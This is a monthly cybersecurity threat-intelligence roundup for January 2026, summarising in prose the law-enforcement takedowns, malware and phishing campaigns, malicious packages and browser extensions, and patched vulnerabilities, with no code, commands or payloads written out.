Monthly Threat Briefing
Diamond Trail

Cyware Monthly Threat Intelligence, January 2026

shutterstock 2547671715

The Good

Cybersecurity had a rare win streak this month. The FBI and DOJ shut down RAMP, a notorious dark web forum for ransomware activity, permanently disrupting a key hub for criminal collaboration. Google followed up by dismantling IPIDEA, a major residential proxy network abused by multiple nation-state and cybercrime groups, significantly shrinking their attack infrastructure. Moreover, the FBI launched Operation Winter SHIELD, offering clear, actionable guidance to help organizations strengthen IT and OT defenses and reduce exploitation risks.

  • The FBI has successfully taken down the Russian Anonymous Marketplace (RAMP), a notorious dark web forum known for facilitating ransomware discussions and services. This operation, conducted in collaboration with the US Attorney’s Office and the Department of Justice, resulted in RAMP's websites being replaced with law enforcement seizure notices. Established in 2012, RAMP became a significant hub for low-to-mid-tier ransomware groups, particularly after other forums banned ransomware discussions. Its administrator, Stallman, confirmed the takedown and stated there are no plans to rebuild the platform.

  • Google, in collaboration with industry partners, has successfully disrupted IPIDEA, one of the largest residential proxy networks globally, which facilitated cybercrime and espionage. This initiative combined legal actions, including court orders to shut down malicious domains, with technical measures to enhance security. Google Play Protect now alerts users about applications containing IPIDEA's SDKs and blocks their installation on certified devices. The network has been linked to numerous botnets and was exploited by threat actors from countries like China, DPRK, Iran, and Russia for various attacks, including password spraying and accessing software-as-a-service environments. The disruption significantly reduced the number of available proxy devices, impacting affiliated services reliant on shared infrastructure.

  • The FBI launched Operation Winter SHIELD, a campaign outlining ten cybersecurity actions for organizations to protect IT and OT environments. The campaign aims to enhance resilience by identifying adversary focus areas and providing actionable steps to reduce exploitation risks. The initiative aligns with the US National Cyber Strategy and FBI Cyber Strategy, running for ten weeks with detailed recommendations. Recommendations include adopting phish-resistant authentication, managing third-party risks, protecting security logs, maintaining offline backups, and strengthening email protections.

  • Cybersecurity researchers have discovered two malicious packages on PyPI, named `spellcheckerpy` and `spellcheckpy`, which were designed to deliver a RAT. These packages, downloaded over 1,000 times, contained a base64-encoded payload hidden in a Basque language dictionary file. Initially, the packages were dormant, but version 1.2.0 activated the malicious functionality upon import. The RAT downloader is capable of fingerprinting compromised hosts and executing commands from an external domain associated with a hosting provider known for servicing nation-state actors. This incident is not isolated, as previous fake spell-checking tools have been found on PyPI, suggesting a consistent threat actor. Additionally, several malicious npm packages have emerged, targeting cryptocurrency wallets and executing phishing campaigns against specific industries in various countries.

  • The EU has proposed significant updates to its Cybersecurity Act, referred to as "Cybersecurity Act 2.0," to enhance cybersecurity across the bloc. This revision addresses previous criticisms regarding the act's voluntary nature and slow certification processes. Key changes include the introduction of a trusted ICT supply chain security framework, mandatory derisking of telecom networks from high-risk suppliers, and streamlined certification schemes that must be developed within 12 months. Additionally, ENISA will see an expansion of its role, gaining more authority and resources to lead responses to major cyber incidents and support businesses. The new act aims to ensure better protection of critical ICT supply chains and strengthen the EU's overall cybersecurity posture.

  • The DHS is finalizing plans for a new council named ANCHOR (Alliance of National Councils for Homeland Operational Resilience) to replace the disbanded Critical Infrastructure Partnership Advisory Council (CIPAC). ANCHOR aims to enhance communication between government and industry regarding critical infrastructure security, addressing ongoing threats, particularly from cyber attacks. Unlike CIPAC, which was burdened by bureaucratic processes, ANCHOR seeks to facilitate broader discussions without rigid charter requirements.

The Bad

Threat actors are getting bolder, increasingly abusing trusted platforms, social engineering, and resilient malware infrastructure to carry out stealthy, high-impact attacks. A fake VS Code extension, ClawdBot Agent, is posing as a legitimate AI coding assistant to silently deploy malware and remote access tools on Windows systems. At the same time, researchers uncovered a spyware campaign in Pakistan using a fake dating app, GhostChat, to steal sensitive data and hijack WhatsApp accounts, while a multi-stage phishing operation in Russia is delivering Amnesia RAT and ransomware through deceptive documents and cloud-hosted payloads.

  • A recently discovered fake VS Code extension named ClawdBot Agent poses as a legitimate AI coding assistant while secretly deploying malware on Windows systems. This malicious extension activates automatically upon starting VS Code, downloading and executing harmful files without user interaction. The attackers cleverly used the name of the popular Clawdbot to exploit brand recognition, creating a polished interface and integrating with multiple AI providers. The extension's code includes a hidden payload delivery mechanism, relying on a command-and-control server to fetch additional malicious components. Notably, it installs a weaponized version of ScreenConnect, allowing remote access to infected machines. The sophisticated design features multiple layers of redundancy, ensuring the malware remains functional even if primary servers are taken down.

  • ESET researchers have identified a sophisticated spyware campaign in Pakistan that uses a fake dating app called GhostChat to lure victims. Posing as a chat platform, the app features locked female profiles and requires users to enter hardcoded access codes, creating an illusion of exclusivity. Once installed, GhostChat covertly monitors device activity and exfiltrates sensitive data, including contacts and documents. The campaign is linked to broader espionage activities, including ClickFix attacks that compromise victims’ computers and a WhatsApp hijacking technique called GhostPairing, which allows attackers to access users' chat histories. This coordinated effort employs social engineering tactics and impersonates governmental organizations to distribute malware.

  • A Vietnam-based cybercrime group is utilizing AI to enhance its phishing campaigns, primarily distributing the PureRAT malware. These attacks typically begin with phishing emails disguised as job offers, leading victims to download malicious files hosted on cloud services like Dropbox. Once opened, these files initiate an infection chain that installs PureRAT or other payloads, such as HVNC. The attackers employ sophisticated techniques, including AI-generated scripts with detailed comments in Vietnamese, which guide the execution of malicious actions. The scripts create hidden directories, rename files, and establish persistence on compromised systems by adding entries to the Windows Startup registry. 

  • North Korean hacking group Konni has been observed using AI-generated PowerShell malware to target blockchain developers in Japan, Australia, and India. This phishing campaign, known as Operation Poseidon, exploits social engineering techniques, employing malicious emails disguised as financial notices to trick recipients into downloading harmful ZIP files. These files contain a Windows shortcut that executes an embedded PowerShell loader, leading to the deployment of a backdoor known as EndRAT. The malware is designed to evade detection and establish persistence on infected systems, allowing attackers to gain broader access to development environments.

  • A multi-stage phishing campaign has been identified targeting users in Russia, utilizing ransomware and Amnesia RAT. The attack begins with social engineering tactics, presenting seemingly benign business documents that distract victims while malicious activities occur in the background. The campaign effectively employs public cloud services for payload distribution, complicating detection and takedown efforts. Malicious scripts are delivered through compressed archives containing deceptive documents and Windows shortcuts, which, when executed, initiate a series of PowerShell commands to download additional payloads. The final stages include deploying Amnesia RAT for extensive data theft and a ransomware variant that encrypts files and manipulates cryptocurrency transactions.

  • North Korean hackers associated with the Contagious Interview campaign are targeting developers by using malicious Microsoft VS Code projects to deliver backdoor malware. This tactic involves instructing victims to clone repositories from platforms like GitHub and launch them in VS Code, where embedded malicious payloads are executed through task configuration files. The malware, disguised as benign files such as spell-check dictionaries, utilizes obfuscated JavaScript to establish communication with remote servers, enabling remote code execution and persistent access. Attackers specifically target software engineers in cryptocurrency and fintech sectors to gain access to sensitive information and digital assets. Additionally, the campaign has evolved to include various delivery methods, such as malicious npm dependencies and advanced modules for keylogging and cryptocurrency mining.

  • A malicious ad-blocker extension called NexShield has been discovered, targeting Chrome and Edge users through a malvertising campaign. This extension creates a denial-of-service condition by generating infinite connections, leading to browser crashes and unresponsiveness. Once the browser restarts, NexShield displays a deceptive pop-up warning users of security issues and instructs them to execute malicious commands in the Windows command prompt. These commands trigger an obfuscated PowerShell script that downloads a remote access tool known as ModeloRAT, which can perform various malicious activities within corporate environments. Researchers attribute this evolving threat to a group named KongTuke, which has been increasingly focusing on enterprise networks since early 2025. 

  • Russian hacking group tracked as Void Blizzard deploys PLUGGYAPE malware to target Ukrainian defense forces via Signal and WhatsApp, distributed through fake charity links. The malware employs Python, WebSocket, and MQTT for communication, with dynamic C2 updates using external paste services. Attackers use legitimate Ukrainian accounts and personalized tactics to enhance credibility in their operations. Other campaigns include phishing emails delivering Go-based stealers (FILEMESS), OrcaC2 frameworks, and LaZagne password recovery tools. Ukrainian institutions face spear-phishing campaigns leveraging malicious ZIP archives and LNK files.

  • Cisco has addressed a critical vulnerability, tracked as CVE-2025-20393, affecting its Secure Email Gateway and Secure Email and Web Manager products. This security flaw, disclosed in December 2025, was exploited by a China-linked threat group known as UAT-9686, allowing attackers to execute arbitrary commands with root privileges on compromised appliances. The vulnerability stemmed from insufficient validation of HTTP requests, enabling unauthenticated remote attackers to manipulate affected systems. Cisco reported that the exploitation had been ongoing since at least November 2025, with threat actors deploying the AquaShell backdoor and other malicious tools.

New Threats

Threat activity continues to escalate across platforms and geographies. A new Android malware campaign is abusing Hugging Face to host and distribute thousands of malicious APKs, luring users with a fake security app before deploying a remote access trojan that steals financial credentials via accessibility abuse. Meanwhile, initial access broker TA584 has expanded its ransomware operations by adopting Tsundere Bot and XWorm RAT, using evasive email-based attack chains and blockchain-backed C2 infrastructure to scale attacks beyond North America and the U.K. Rounding out the threat landscape, a new malware-as-a-service called Stanley is enabling cybercriminals to publish malicious Chrome extensions that bypass review checks and deliver highly convincing phishing attacks directly through the browser.

  • A new Android malware campaign has exploited the Hugging Face platform to distribute over 6,000 variants of malicious APKs designed to steal credentials from financial services. The attack begins with victims installing a dropper app called TrustBastion, which falsely claims to enhance device security. After installation, the app prompts users to update, redirecting them to a Hugging Face dataset repository to download the actual malware. This malware acts as a remote access tool, leveraging Android’s Accessibility Services to capture user activity, display fake login interfaces for services like Alipay and WeChat, and exfiltrate sensitive data to its operators.

  • A prolific initial access broker known as TA584 has recently adopted the Tsundere Bot alongside the XWorm RAT to facilitate ransomware attacks. Active since 2020, TA584 has significantly increased its operations, employing a sophisticated attack chain that evades static detection methods. The Tsundere Bot, attributed to a Russian-speaking operator and linked to the 123 Stealer malware, can gather information, exfiltrate data, and install additional payloads. This attack chain begins with emails from compromised accounts, leading targets through a series of redirects and CAPTCHA pages to execute a PowerShell command that loads the malware. TA584's activity has expanded beyond North America and the U.K to include Germany and Australia, indicating a broader targeting strategy. The malware operates as a service, utilizing the Ethereum blockchain for C2 communication and featuring capabilities to profile infected systems and execute arbitrary code.

  • A new MaaS named Stanley has emerged, enabling the creation of malicious Chrome extensions that can bypass Google's review process and be published on the Chrome Web Store. Advertised by a seller using the alias Stanley, this service facilitates phishing attacks by overlaying full-screen iframes with deceptive content while keeping the browser's address bar unchanged to maintain the illusion of legitimacy. Stanley offers silent auto-installation for browsers like Chrome, Edge, and Brave, along with various subscription tiers, including a Luxe Plan that provides a web panel for managing the malicious extensions. Additionally, the service allows operators to enable hijacking rules and send notifications to victims, enhancing the phishing process.

  • A new malicious campaign utilizes the ClickFix method alongside fake CAPTCHA prompts and signed Microsoft App-V scripts to distribute the Amatera info-stealer. The attack initiates with a fake CAPTCHA that instructs victims to manually execute a command through the Windows Run dialog, exploiting the legitimate SyncAppvPublishingServer.vbs script to launch PowerShell. This execution verifies user interaction and thwarts automated analysis by stalling in sandbox environments. Subsequently, the malware retrieves configuration data from a public Google Calendar file and uses steganography to conceal payloads within PNG images hosted on public CDNs. The final stage involves decrypting and executing native shellcode to activate the Amatera infostealer, which connects to a hardcoded IP address to collect browser data and credentials from infected systems, operating as MaaS.

  • A new phishing campaign has emerged, utilizing LinkedIn messages to distribute RAT through DLL sideloading. Cybercriminals target high-value individuals by sending messages that build trust and encourage them to download a malicious WinRAR self-extracting archive. This archive contains a legitimate PDF reader application, alongside a malicious DLL that is sideloaded when the application is executed. The attack installs a Python interpreter and executes Base64-encoded shellcode in memory, enabling persistent remote access to the compromised system. This method allows attackers to operate stealthily, bypassing traditional security measures typically focused on email. 

  • A new strain of malware known as PDFSider has been deployed in ransomware attacks against a Fortune 100 company in the finance sector. Attackers utilized social engineering tactics, impersonating technical support to trick employees into installing Microsoft’s Quick Assist tool. PDFSider is delivered via spearphishing emails containing a legitimate executable for the PDF24 Creator, alongside a malicious DLL that is loaded through DLL side-loading. This method allows the malware to bypass security systems effectively. PDFSider operates stealthily, with minimal disk artifacts, and exfiltrates system information over DNS. It employs AES-256-GCM encryption for secure communication, making it more akin to espionage tools than typical financially motivated malware, and includes anti-analysis features to evade detection in sandbox environments.

  • A new cyber-espionage campaign has emerged, targeting U.S. government and policy entities through Venezuela-themed spear phishing tactics to deliver the LOTUSLITE backdoor. Attributed to the Chinese state-sponsored group Mustang Panda, this campaign utilizes DLL side-loading techniques to launch its attacks. The LOTUSLITE backdoor is a custom C++ implant designed for remote command execution and data exfiltration, establishing persistence via Windows Registry modifications.

  • Microsoft's January 2026 security update addresses 114 vulnerabilities, including one actively exploited flaw (CVE-2026-20805) affecting the Desktop Window Manager, which could lead to unauthorized disclosure of sensitive information. Among the vulnerabilities, eight are rated Critical, with many related to privilege escalation and information disclosure. Notably, the update addresses a security feature bypass concerning Secure Boot Certificate Expiration (CVE-2026-21265) and a critical privilege escalation flaw in Windows Virtualization-Based Security (CVE-2026-20876). Microsoft also removed outdated Agere Soft Modem drivers due to a local privilege escalation flaw.

  • Two malicious Chrome extensions, affecting over 900,000 users, have been discovered exfiltrating sensitive data from OpenAI ChatGPT and DeepSeek conversations. Named "Chat GPT for Chrome with GPT-5, Claude Sonnet & DeepSeek AI" and "AI Sidebar with Deepseek, ChatGPT, Claude, and more," these extensions impersonated legitimate tools to gain user trust. Once installed, they requested permissions to collect anonymized analytics but instead harvested complete conversation data and browsing activity, sending this information to remote servers every 30 minutes. This tactic, referred to as "Prompt Poaching," poses significant risks, as the stolen data can be weaponized for corporate espionage and identity theft. Additionally, legitimate extensions like Similarweb have also been implicated in similar data collection practices, raising concerns about privacy and security in browser extensions.

  • A sophisticated cyberattack campaign by the Black Cat hacker group has been revealed, utilizing fake Notepad++ download websites to distribute malware and steal sensitive data. By exploiting search engine optimization techniques, these phishing sites rank prominently in search results, deceiving users into downloading malicious software. The malware employs advanced tactics, including a multi-layered execution chain and DLL side-loading, to establish persistence and evade detection. Once installed, it creates shortcuts that lead to backdoor components, enabling the theft of browser credentials, keylogging, and sensitive data exfiltration.

Discover Related Resources